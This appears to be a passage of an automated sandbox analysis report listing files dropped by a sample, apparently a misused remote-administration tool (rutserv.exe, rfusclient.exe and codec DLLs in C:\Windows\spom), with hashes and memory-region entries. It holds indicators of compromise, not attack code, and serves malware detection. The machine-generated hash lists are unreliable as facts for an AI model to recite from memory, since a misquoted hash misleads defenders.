SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
C:\Users\Admin\AppData\Local\Temp\vp8encoder.dllFilesize
238KB
MD5200cba4b9cbdd64f1a281b89cd1467f3
SHA1fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA51215a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
-
C:\Users\Admin\AppData\Local\Temp\webmmux.dllFilesize
90KB
MD5aa78ed008f72533c7136bf6d4bddb0d0
SHA12e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA25641e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
-
C:\Users\Admin\AppData\Local\Temp\webmvorbisdecoder.dllFilesize
141KB
MD50867a260483876336a727cf9f2928b13
SHA13c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
-
C:\Users\Admin\AppData\Local\Temp\webmvorbisencoder.dllFilesize
202KB
MD543adc4acd56c56b0a25664954c7aa80c
SHA1d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA2560e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Windows\spom\vp8decoder.dllFilesize
127KB
MD5bda3c03c3e5d65922a311009e0ae8cd6
SHA137093c457ac5f01649b4d23a3d075a531af08baa
SHA25630dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290
SHA512eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b
-
C:\Windows\spom\vp8encoder.dllFilesize
238KB
MD5200cba4b9cbdd64f1a281b89cd1467f3
SHA1fc3ccf8d57efcdc0d22b61ff6e49798d551a9118
SHA256c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e
SHA51215a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3
-
C:\Windows\spom\webmmux.dllFilesize
90KB
MD5aa78ed008f72533c7136bf6d4bddb0d0
SHA12e9abd74e615adc99f561cbdbe6067dfd81a406a
SHA25641e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11
SHA512e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021
-
C:\Windows\spom\webmvorbisdecoder.dllFilesize
141KB
MD50867a260483876336a727cf9f2928b13
SHA13c8c59bfba6ed2aeef35c0d1fc4689683df1e660
SHA256cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207
SHA512b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f
-
C:\Windows\spom\webmvorbisencoder.dllFilesize
202KB
MD543adc4acd56c56b0a25664954c7aa80c
SHA1d9085625b4a39b3969db8047ad3224b3fc9f60fc
SHA2560e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
-
memory/308-141-0x0000000000000000-mapping.dmp
-
memory/532-188-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/532-179-0x0000000000000000-mapping.dmp
-
memory/532-183-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/1044-145-0x0000000000000000-mapping.dmp
-
memory/1112-180-0x0000000000000000-mapping.dmp
-
memory/1112-189-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/1112-184-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/1376-133-0x0000000000000000-mapping.dmp
-
memory/1420-147-0x0000000000000000-mapping.dmp
-
memory/1500-132-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/1500-137-0x0000000000400000-0x0000000000425000-memory.dmpFilesize
148KB
-
memory/1748-167-0x0000000000000000-mapping.dmp
-
memory/1820-143-0x0000000000000000-mapping.dmp
-
memory/2112-136-0x0000000000000000-mapping.dmp
-
memory/2248-165-0x0000000000000000-mapping.dmp
-
memory/2292-169-0x0000000000000000-mapping.dmp
-
memory/2656-168-0x0000000000000000-mapping.dmp
-
memory/2888-144-0x0000000000000000-mapping.dmp
-
memory/3196-163-0x0000000000000000-mapping.dmp
-
memory/3432-185-0x0000000000000000-mapping.dmp
-
memory/3432-187-0x0000000000400000-0x0000000000AE6000-memory.dmpFilesize
6.9MB
-
memory/3476-158-0x0000000000000000-mapping.dmp
-
memory/4040-142-0x0000000000000000-mapping.dmp
-
memory/4208-164-0x0000000000000000-mapping.dmp
-
memory/4244-166-0x0000000000000000-mapping.dmp
-
memory/4348-170-0x0000000000000000-mapping.dmp
-
memory/4404-161-0x0000000000000000-mapping.dmp
-
memory/4532-139-0x0000000000000000-mapping.dmp
-
memory/4612-148-0x0000000000000000-mapping.dmp
-
memory/5036-146-0x0000000000000000-mapping.dmp